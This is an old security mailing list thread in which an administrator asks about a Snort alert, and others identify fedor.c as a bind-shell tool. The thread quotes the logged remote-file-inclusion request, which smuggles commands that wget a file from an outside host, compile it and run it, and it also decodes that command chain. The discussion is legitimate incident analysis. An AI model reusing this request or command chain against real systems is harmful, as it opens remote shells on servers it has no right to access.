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Re: http://xfteam.net/fedor.c - Anyone seen this before??


From: "Andrei Galca-Vasiliu" <andrei () fq ro>
Date: Mon, 24 Nov 2003 13:08:03 +0200

http://xfteam.net/fedor.c
/*
bindtty - like bindshell, but with tty

Features:
- it can handle any number of clients
- allocates tty for each session
- no using termios.h/tty.h: compiles on most of gccs
- linux specific ;(

by sd <sd () sf cz>
*/

i guess this says it all... it binds a shel on a port (7832 in this case)
used by scriptkiddies to gain shell access where they can`t install rootkits
or add users.

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----- Original Message ----- 
From: <allan.vanleeuwen () orangemail nl>
To: <full-disclosure () lists netsys com>
Sent: Monday, November 24, 2003 12:14 PM
Subject: RE: [Full-disclosure] http://xfteam.net/fedor.c - Anyone seen this
before??


Well ...

Xfteam.net resolves fine for me ...(IP 69.56.243.146)
There's a website with a few files for download ... One of them was
detected
as a linux virus by my NAV :)
There's a folder 'forum' which looks like a portugese hackers hideout ...
Not very much posted there though ...

My 2c.

-----Original Message-----
From: Dan [mailto:dan () lockedbox net]
Sent: maandag 24 november 2003 10:28
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] http://xfteam.net/fedor.c - Anyone seen this
before??


Hi,
Our Snort picked up an interesting attempt to download, compile and
execute.
Noting also the fact that the sub dir its attempting to access has not
been
there for over 4 months(/logjam/)?

Has anyone actually seen what this fedor.c is? I have done some google'ing
but
it comes up blank.

Has anyone else noticed this kindof request recently?

Is it just me or is xfteam.net not resolving anyway?

Orignal HTTP request:
GET /logjam/showhits.php?

rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://x

fteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%
20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f

Breaking this down we get(twice):
uname -a
cd /tmp
wget http://xfteam.net/fedor.c
gcc -o f fedor.c
./f


Regards,
Daniel.



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